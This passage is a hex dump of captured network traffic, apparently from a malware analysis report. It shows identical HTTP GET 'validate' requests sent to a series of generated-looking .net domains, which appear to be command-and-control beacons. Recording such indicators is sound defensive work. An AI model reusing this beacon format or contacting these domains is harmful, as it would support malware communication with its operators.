0x00000020 (00032)   6f64653d 736f7826 763d3035 3026736f   ode=sox&v=050&so
0x00000030 (00048)   783d3466 61653061 3030266c 656e6864   x=4fae0a00&lenhd
0x00000040 (00064)   72204854 54502f31 2e300d0a 41636365   r HTTP/1.0..Acce
0x00000050 (00080)   70743a20 2a2f2a0d 0a436f6e 6e656374   pt: */*..Connect
0x00000060 (00096)   696f6e3a 20636c6f 73650d0a 486f7374   ion: close..Host
0x00000070 (00112)   3a206c69 6665636c 6f636b2e 6e65740d   : lifeclock.net.
0x00000080 (00128)   0a0d0a0a 0d0a740d 20d59b01            ......t. ...

0x00000000 (00000)   47455420 2f696e64 65782e70 68703f6d   GET /index.php?m
0x00000010 (00016)   6574686f 643d7661 6c696461 7465266d   ethod=validate&m
0x00000020 (00032)   6f64653d 736f7826 763d3035 3026736f   ode=sox&v=050&so
0x00000030 (00048)   783d3466 61653061 3030266c 656e6864   x=4fae0a00&lenhd
0x00000040 (00064)   72204854 54502f31 2e300d0a 41636365   r HTTP/1.0..Acce
0x00000050 (00080)   70743a20 2a2f2a0d 0a436f6e 6e656374   pt: */*..Connect
0x00000060 (00096)   696f6e3a 20636c6f 73650d0a 486f7374   ion: close..Host
0x00000070 (00112)   3a207265 636f7264 736f6c64 6965722e   : recordsoldier.
0x00000080 (00128)   6e65740d 0a0d0a0d 20d59b01            net..... ...

0x00000000 (00000)   47455420 2f696e64 65782e70 68703f6d   GET /index.php?m
0x00000010 (00016)   6574686f 643d7661 6c696461 7465266d   ethod=validate&m
0x00000020 (00032)   6f64653d 736f7826 763d3035 3026736f   ode=sox&v=050&so
0x00000030 (00048)   783d3466 61653061 3030266c 656e6864   x=4fae0a00&lenhd
0x00000040 (00064)   72204854 54502f31 2e300d0a 41636365   r HTTP/1.0..Acce
0x00000050 (00080)   70743a20 2a2f2a0d 0a436f6e 6e656374   pt: */*..Connect
0x00000060 (00096)   696f6e3a 20636c6f 73650d0a 486f7374   ion: close..Host
0x00000070 (00112)   3a20666c 69657273 75727072 6973652e   : fliersurprise.
0x00000080 (00128)   6e65740d 0a0d0a0d 20d59b01            net..... ...

0x00000000 (00000)   47455420 2f696e64 65782e70 68703f6d   GET /index.php?m
0x00000010 (00016)   6574686f 643d7661 6c696461 7465266d   ethod=validate&m
0x00000020 (00032)   6f64653d 736f7826 763d3035 3026736f   ode=sox&v=050&so
0x00000030 (00048)   783d3466 61653061 3030266c 656e6864   x=4fae0a00&lenhd
0x00000040 (00064)   72204854 54502f31 2e300d0a 41636365   r HTTP/1.0..Acce
0x00000050 (00080)   70743a20 2a2f2a0d 0a436f6e 6e656374   pt: */*..Connect
0x00000060 (00096)   696f6e3a 20636c6f 73650d0a 486f7374   ion: close..Host
0x00000070 (00112)   3a206869 73746f72 79627269 6768742e   : historybright.
0x00000080 (00128)   6e65740d 0a0d0a0d 20d59b01            net..... ...

0x00000000 (00000)   47455420 2f696e64 65782e70 68703f6d   GET /index.php?m
0x00000010 (00016)   6574686f 643d7661 6c696461 7465266d   ethod=validate&m
0x00000020 (00032)   6f64653d 736f7826 763d3035 3026736f   ode=sox&v=050&so
0x00000030 (00048)   783d3466 61653061 3030266c 656e6864   x=4fae0a00&lenhd
0x00000040 (00064)   72204854 54502f31 2e300d0a 41636365   r HTTP/1.0..Acce
0x00000050 (00080)   70743a20 2a2f2a0d 0a436f6e 6e656374   pt: */*..Connect
0x00000060 (00096)   696f6e3a 20636c6f 73650d0a 486f7374   ion: close..Host
0x00000070 (00112)   3a206368 69656673 6f6c6469 65722e6e   : chiefsoldier.n
0x00000080 (00128)   65740d0a 0d0a0a0d 20d59b01            et...... ...

0x00000000 (00000)   47455420 2f696e64 65782e70 68703f6d   GET /index.php?m
0x00000010 (00016)   6574686f 643d7661 6c696461 7465266d   ethod=validate&m
0x00000020 (00032)   6f64653d 736f7826 763d3035 3026736f   ode=sox&v=050&so
0x00000030 (00048)   783d3466 61653061 3030266c 656e6864   x=4fae0a00&lenhd
0x00000040 (00064)   72204854 54502f31 2e300d0a 41636365   r HTTP/1.0..Acce
0x00000050 (00080)   70743a20 2a2f2a0d 0a436f6e 6e656374   pt: */*..Connect
0x00000060 (00096)   696f6e3a 20636c6f 73650d0a 486f7374   ion: close..Host
0x00000070 (00112)   3a20636c 61737373 75727072 6973652e   : classsurprise.
0x00000080 (00128)   6e65740d 0a0d0a0d 20d59b01            net..... ...

0x00000000 (00000)   47455420 2f696e64 65782e70 68703f6d   GET /index.php?m
0x00000010 (00016)   6574686f 643d7661 6c696461 7465266d   ethod=validate&m
0x00000020 (00032)   6f64653d 736f7826 763d3035 3026736f   ode=sox&v=050&so
0x00000030 (00048)   783d3466 61653061 3030266c 656e6864   x=4fae0a00&lenhd
0x00000040 (00064)   72204854 54502f31 2e300d0a 41636365   r HTTP/1.0..Acce
0x00000050 (00080)   70743a20 2a2f2a0d 0a436f6e 6e656374   pt: */*..Connect
0x00000060 (00096)   696f6e3a 20636c6f 73650d0a 486f7374   ion: close..Host
0x00000070 (00112)   3a207468 6f736563 6f6e7469 6e75652e   : thosecontinue.
0x00000080 (00128)   6e65740d 0a0d0a0d 20d59b01            net..... ...

0x00000000 (00000)   47455420 2f696e64 65782e70 68703f6d   GET /index.php?m
0x00000010 (00016)   6574686f 643d7661 6c696461 7465266d   ethod=validate&m
0x00000020 (00032)   6f64653d 736f7826 763d3035 3026736f   ode=sox&v=050&so
0x00000030 (00048)   783d3466 61653061 3030266c 656e6864   x=4fae0a00&lenhd
0x00000040 (00064)   72204854 54502f31 2e300d0a 41636365   r HTTP/1.0..Acce
0x00000050 (00080)   70743a20 2a2f2a0d 0a436f6e 6e656374   pt: */*..Connect
0x00000060 (00096)   696f6e3a 20636c6f 73650d0a 486f7374   ion: close..Host
0x00000070 (00112)   3a207468 726f7567 68636f6e 7461696e   : throughcontain
0x00000080 (00128)   2e6e6574 0d0a0d0a 20d59b01            .net.... ...

0x00000000 (00000)   47455420 2f696e64 65782e70 68703f6d   GET /index.php?m
0x00000010 (00016)   6574686f 643d7661 6c696461 7465266d   ethod=validate&m
0x00000020 (00032)   6f64653d 736f7826 763d3035 3026736f   ode=sox&v=050&so
0x00000030 (00048)   783d3466 61653061 3030266c 656e6864   x=4fae0a00&lenhd
0x00000040 (00064)   72204854 54502f31 2e300d0a 41636365   r HTTP/1.0..Acce
0x00000050 (00080)   70743a20 2a2f2a0d 0a436f6e 6e656374   pt: */*..Connect
0x00000060 (00096)   696f6e3a 20636c6f 73650d0a 486f7374   ion: close..Host
0x00000070 (00112)   3a206265 6c6f6e67 67756172 642e6e65   : belongguard.ne
0x00000080 (00128)   740d0a0d 0a0a0d0a 20d59b01            t....... ...

0x00000000 (00000)   47455420 2f696e64 65782e70 68703f6d   GET /index.php?m
0x00000010 (00016)   6574686f 643d7661 6c696461 7465266d   ethod=validate&m
0x00000020 (00032)   6f64653d 736f7826 763d3035 3026736f   ode=sox&v=050&so
0x00000030 (00048)   783d3466 61653061 3030266c 656e6864   x=4fae0a00&lenhd
0x00000040 (00064)   72204854 54502f31 2e300d0a 41636365   r HTTP/1.0..Acce
0x00000050 (00080)   70743a20 2a2f2a0d 0a436f6e 6e656374   pt: */*..Connect
0x00000060 (00096)   696f6e3a 20636c6f 73650d0a 486f7374   ion: close..Host
0x00000070 (00112)   3a206d61 7962656c 6c696e65 74686164   : maybellinethad
0x00000080 (00128)   64657573 2e6e6574 0d0a0d0a            deus.net....

Strings